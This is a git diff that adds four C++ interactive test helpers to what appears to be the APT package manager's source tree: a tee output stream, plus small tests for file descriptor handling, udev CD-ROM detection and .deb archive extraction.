--- /dev/null
+++ b/test/interactive-helper/teestream.h
@@ -0,0 +1,62 @@
+#ifndef APT_HELPER_TEESTREAM_H
+#define APT_HELPER_TEESTREAM_H
+
+/* 'basic' implementation of a streambuf which passes the output
+ to two 'real' streambufs emulating '| tee' on the shell
+
+ The main use is streaming debug output to std::clog as well as
+ a logfile easily, so don't expect that to be a bulletproof
+ implementation. */
+
+#include <apt-pkg/macros.h>
+#include <iostream>
+
+template <typename CharT, typename Traits = std::char_traits<CharT>
+> class basic_teebuf: public std::basic_streambuf<CharT, Traits>
+{
+public:
+ basic_teebuf(std::basic_streambuf<CharT, Traits> * const sb1,
+ std::basic_streambuf<CharT, Traits> * const sb2)
+ : s1(sb1), s2(sb2) {}
+protected:
+ virtual std::streamsize xsputn(const CharT* s, std::streamsize c) APT_OVERRIDE
+ {
+ return s2->sputn(s, s1->sputn(s, c));
+ }
+ // overflow is the fallback of sputc which is non-virtual
+ typedef typename Traits::int_type int_type;
+ virtual int_type overflow(int_type ch = Traits::eof()) APT_OVERRIDE
+ {
+ auto const eof = Traits::eof();
+ if (Traits::eq_int_type(ch, Traits::eof()) == true)
+ return eof;
+
+ auto const r1 = s1->sputc(Traits::to_char_type(ch));
+ auto const r2 = s2->sputc(Traits::to_char_type(ch));
+ return Traits::eq_int_type(r1, eof) ? r1: r2;
+ }
+ virtual void imbue(const std::locale& loc) APT_OVERRIDE
+ {
+ s1->pubimbue(loc);
+ s2->pubimbue(loc);
+ }
+ virtual int sync() APT_OVERRIDE
+ {
+ auto const r1 = s1->pubsync();
+ auto const r2 = s2->pubsync();
+ return r1 == 0 ? r2 : r1;
+ }
+private:
+ std::basic_streambuf<CharT, Traits> * const s1;
+ std::basic_streambuf<CharT, Traits> * const s2;
+};
+template <typename CharT, typename Traits = std::char_traits<CharT>
+> class basic_teeostream: public std::basic_ostream<CharT, Traits>
+{
+public:
+ basic_teeostream(std::basic_ostream<CharT, Traits> &o1, std::basic_ostream<CharT, Traits> &o2) :
+ std::basic_ostream<CharT, Traits>(&tbuf), tbuf(o1.rdbuf(), o2.rdbuf()) {}
+private:
+ basic_teebuf<CharT, Traits> tbuf;
+};
+#endif
diff --git a/test/interactive-helper/test_fileutl.cc b/test/interactive-helper/test_fileutl.cc
new file mode 100644
index 0000000..6c29b74
--- /dev/null
+++ b/test/interactive-helper/test_fileutl.cc
@@ -0,0 +1,44 @@
+#include <apt-pkg/error.h>
+#include <apt-pkg/fileutl.h>
+#include <apt-pkg/strutl.h>
+
+#include <fcntl.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <iostream>
+#include <string>
+
+static void callsystem(std::string const &call)
+{
+ auto ret = system(call.c_str());
+ if (WIFEXITED(ret) == false || WEXITSTATUS(ret) != 0)
+ _error->Error("Calling %s failed!", call.c_str());
+}
+
+int main(int, char ** argv)
+{
+ auto const pid = getpid();
+ std::string ls;
+ strprintf(ls, "ls -l /proc/%d/fd", pid);
+ callsystem(ls);
+ FileFd t;
+ t.Open(argv[1], FileFd::ReadOnly, FileFd::Extension);
+ callsystem(ls);
+ char buf[1024];
+ unsigned long long act;
+ while (t.Read(buf, sizeof(buf), &act))
+ if (act == 0)
+ break;
+ callsystem(ls);
+ t.Seek(5);
+ callsystem(ls);
+ t.Close();
+ callsystem(ls);
+ auto const ret = _error->PendingError();
+ _error->DumpErrors();
+ return ret;
+}
diff --git a/test/interactive-helper/test_udevcdrom.cc b/test/interactive-helper/test_udevcdrom.cc
new file mode 100644
index 0000000..2355186
--- /dev/null
+++ b/test/interactive-helper/test_udevcdrom.cc
@@ -0,0 +1,23 @@
+#include <config.h>
+
+#include <apt-pkg/cdrom.h>
+
+#include <iostream>
+#include <string>
+#include <vector>
+#include <assert.h>
+#include <stddef.h>
+
+int main()
+{
+ pkgUdevCdromDevices c;
+ assert(c.Dlopen());
+
+ std::vector<CdromDevice> l;
+ l = c.Scan();
+ assert(l.empty() == false);
+ for (size_t i = 0; i < l.size(); ++i)
+ std::cerr << l[i].DeviceName << " "
+ << l[i].Mounted << " "
+ << l[i].MountPath << std::endl;
+}
diff --git a/test/interactive-helper/testdeb.cc b/test/interactive-helper/testdeb.cc
new file mode 100644
index 0000000..0bb24a5
--- /dev/null
+++ b/test/interactive-helper/testdeb.cc
@@ -0,0 +1,51 @@
+#include <config.h>
+
+#include <apt-pkg/arfile.h>
+#include <apt-pkg/debfile.h>
+#include <apt-pkg/dirstream.h>
+#include <apt-pkg/error.h>
+#include <apt-pkg/extracttar.h>
+#include <apt-pkg/fileutl.h>
+
+#include <iostream>
+#include <string>
+
+class NullStream : public pkgDirStream
+{
+ public:
+ virtual bool DoItem(Item &/*Itm*/, int &/*Fd*/) APT_OVERRIDE {return true;};
+};
+
+static bool Test(const char *File)
+{
+ FileFd Fd(File,FileFd::ReadOnly);
+ debDebFile Deb(Fd);
+
+ if (_error->PendingError() == true)
+ return false;
+
+ // Get the archive member and positition the file
+ const ARArchive::Member *Member = Deb.GotoMember("data.tar.gz");
+ if (Member == 0)
+ return false;
+
+ // Extract it.
+ ExtractTar Tar(Deb.GetFile(),Member->Size, "gzip");
+ NullStream Dir;
+ if (Tar.Go(Dir) == false)
+ return false;
+
+ return true;
+}
+
+int main(int argc, const char *argv[])
+{
+ if (argc != 2) {
+ std::cout << "One parameter expected - given " << argc << std::endl;
+ return 100;
+ }
+
+ Test(argv[1]);
+ _error->DumpErrors();
+ return 0;
+}